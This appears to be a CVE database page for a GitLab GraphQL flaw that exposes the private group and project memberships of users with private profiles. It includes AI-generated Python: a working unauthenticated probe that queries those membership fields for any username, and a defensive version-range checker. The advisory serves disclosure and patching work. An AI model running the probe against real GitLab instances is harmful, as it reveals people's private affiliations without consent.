CVE-2020-26417
Description
Information disclosure via GraphQL in GitLab CE/EE 13.1 and later exposes private group and project membership. This affects versions >=13.6 to <13.6.2, >=13.5 to <13.5.5, and >=13.1 to <13.4.7.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
GitLab CE/EE 13.1 through 13.6.1 exposes private group and project membership via unredacted GraphQL queries, leaking information users intended to keep private.
Vulnerability
An information disclosure vulnerability exists in GitLab Community Edition (CE) and Enterprise Edition (EE) versions 13.1 through 13.4.6, 13.5 through 13.5.4, and 13.6 through 13.6.1 (the first fixed releases are 13.4.7, 13.5.5 and 13.6.2). The GraphQL API does not properly redact groupMemberships, projectMemberships, and starredProjects for users who have set their profile to private, allowing unauthenticated or low-privileged users to query this data [1].
Exploitation
An attacker with network access to the GitLab instance can craft a GraphQL query targeting user profiles. No special authentication or elevated privileges are required; the attacker only needs to know or enumerate user IDs or usernames. The vulnerability is triggered when the GraphQL endpoint returns membership data for profiles marked as private, data that should have been redacted according to the user's privacy settings [1].
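The following is an added example, not GitLab's code and not taken from the advisory, showing what the check looks like in practice: a membership query for one username, sent without credentials (or as an unrelated account), whose result is then reduced to "does anything come back for a private profile or not". It assumes the endpoint lives at /api/graphql and that the User type exposes the groupMemberships, projectMemberships and starredProjects connections with the nested shapes used in the query; the sample responses at the bottom are constructed, not captured from a real instance.

```python
"""Probe for the CVE-2020-26417 behaviour: does a GitLab GraphQL endpoint
return membership data for a user whose profile is set to private?

Added example, not GitLab's code. Assumptions (not stated on the page):
the endpoint is <base>/api/graphql, and the User type exposes the
groupMemberships, projectMemberships and starredProjects connections with
the nested shapes used in MEMBERSHIP_QUERY below.
"""
import json
import urllib.request

MEMBERSHIP_QUERY = """
query($username: String!) {
  user(username: $username) {
    username
    groupMemberships   { nodes { group   { fullPath } } }
    projectMemberships { nodes { project { fullPath } } }
    starredProjects    { nodes { fullPath } }
  }
}
"""


def build_request(base_url, username, token=None):
    """POST request for the membership query. Send it WITHOUT a token (or
    with a token for an account unrelated to the target) so the answer
    reflects what an outsider sees."""
    body = json.dumps({"query": MEMBERSHIP_QUERY,
                       "variables": {"username": username}}).encode()
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = "Bearer " + token
    return urllib.request.Request(base_url.rstrip("/") + "/api/graphql",
                                  data=body, headers=headers, method="POST")


def extract_memberships(response):
    """Collapse a GraphQL response into {field: [fullPath, ...]}.
    Returns None when the user does not exist (data.user is null).
    A null connection and an empty node list both count as 'nothing exposed',
    so the check works whichever way a fixed server redacts the field."""
    user = (response.get("data") or {}).get("user")
    if user is None:
        return None
    out = {}
    for field, key in (("groupMemberships", "group"),
                       ("projectMemberships", "project")):
        nodes = (user.get(field) or {}).get("nodes") or []
        out[field] = [n[key]["fullPath"] for n in nodes if n.get(key)]
    starred = (user.get("starredProjects") or {}).get("nodes") or []
    out["starredProjects"] = [n["fullPath"] for n in starred]
    return out


def is_leaking(memberships):
    """True if any membership field is populated for a profile the caller
    should not be able to see into."""
    return memberships is not None and any(memberships.values())


def probe(base_url, username, token=None):
    """Live check: returns (memberships, leaking). Needs network access."""
    with urllib.request.urlopen(build_request(base_url, username, token),
                                timeout=15) as resp:
        data = json.load(resp)
    memberships = extract_memberships(data)
    return memberships, is_leaking(memberships)


# Constructed sample responses (not captured from a real instance) for a
# user "alice" with a private profile, queried anonymously.
VULNERABLE_RESPONSE = {"data": {"user": {
    "username": "alice",
    "groupMemberships": {"nodes": [{"group": {"fullPath": "acme/internal"}}]},
    "projectMemberships": {"nodes": [{"project": {"fullPath": "acme/internal/payroll"}}]},
    "starredProjects": {"nodes": [{"fullPath": "acme/internal/payroll"}]},
}}}

PATCHED_RESPONSE = {"data": {"user": {
    "username": "alice",
    "groupMemberships": {"nodes": []},
    "projectMemberships": None,
    "starredProjects": {"nodes": []},
}}}

if __name__ == "__main__":
    for label, sample in (("vulnerable", VULNERABLE_RESPONSE),
                          ("patched", PATCHED_RESPONSE)):
        found = extract_memberships(sample)
        print(label, "leaking" if is_leaking(found) else "redacted", found)
```

To run it against an instance you administer, pick a test account, set its profile to private, and call probe("https://gitlab.example.com", "thataccount") with no token; a non-empty result means the instance still exposes the fields.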
Impact
Successful exploitation results in unauthorized information disclosure. The attacker learns the private group and project memberships of GitLab users, potentially revealing sensitive organizational structures or non-public collaborations. This violates the confidentiality expectation of users who have selected the private profile option. The vulnerability does not grant write access or code execution on the system [1].
Mitigation
GitLab released patches in versions 13.4.7, 13.5.5, and 13.6.2 on 2020-12-11. All installations running affected versions should upgrade immediately to the corresponding patched release. No workaround is available for unpatched instances beyond restricting network access to the GraphQL endpoint [1]; note that the GitLab web UI itself calls /api/graphql, so blocking that path at a proxy degrades the UI and is only a stopgap until the upgrade.
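Because the affected ranges are per release branch, a plain "is my version below 13.6.2" comparison gets 13.4.x and 13.5.x wrong. The following added example (not GitLab tooling) encodes the three ranges from the advisory and reports which fixed release a given version should move to; the fetch_version helper assumes GitLab's authenticated GET /api/v4/version endpoint, which returns a JSON object with a "version" key.

```python
"""Decide whether a GitLab version string falls inside one of the
CVE-2020-26417 affected ranges and, if so, which fixed release to move to.

Added example, not GitLab tooling. The ranges come from the advisory text.
fetch_version() assumes the authenticated GET /api/v4/version endpoint.
"""
import json
import urllib.request

# (first affected, first fixed) per release branch, from the advisory.
AFFECTED_RANGES = [
    ((13, 1, 0), (13, 4, 7)),
    ((13, 5, 0), (13, 5, 5)),
    ((13, 6, 0), (13, 6, 2)),
]


def parse_version(text):
    """'13.5.3', 'v13.5.3', '13.5.3-ee' -> (13, 5, 3). Edition and
    pre-release suffixes are dropped; missing components count as 0."""
    core = text.strip().lstrip("v").split("-")[0]
    parts = [int(p) for p in core.split(".") if p]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def assess(version_text):
    """Returns {'version', 'affected', 'upgrade_to'} for one version string.
    Versions between branches (e.g. 13.4.8) and before 13.1 are reported
    as not affected, matching the advisory's ranges."""
    v = parse_version(version_text)
    for first_bad, first_fixed in AFFECTED_RANGES:
        if first_bad <= v < first_fixed:
            return {"version": v, "affected": True,
                    "upgrade_to": ".".join(map(str, first_fixed))}
    return {"version": v, "affected": False, "upgrade_to": None}


def fetch_version(base_url, token):
    """Read the running version from the instance (assumed endpoint)."""
    req = urllib.request.Request(base_url.rstrip("/") + "/api/v4/version",
                                 headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)["version"]


if __name__ == "__main__":
    # Constructed sample versions spanning every boundary in the advisory.
    for sample in ("13.0.14", "13.1.0", "13.4.6-ee", "13.4.7", "13.4.8",
                   "13.5.4", "13.5.5", "13.6.1", "13.6.2", "13.7.0"):
        print(sample, assess(sample))
```

assess(fetch_version(url, token)) gives the answer for a live instance; the version endpoint needs a token with at least read_api scope.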
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- (no CPE) range: >=13.1, <13.4.7; >=13.5, <13.5.5; >=13.6, <13.6.2
- (no CPE) range: >=13.6, <13.6.2
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26417.json (CONFIRM)
- gitlab.com/gitlab-org/gitlab/-/issues/282539 (MISC)
News mentions
No linked articles in our index yet.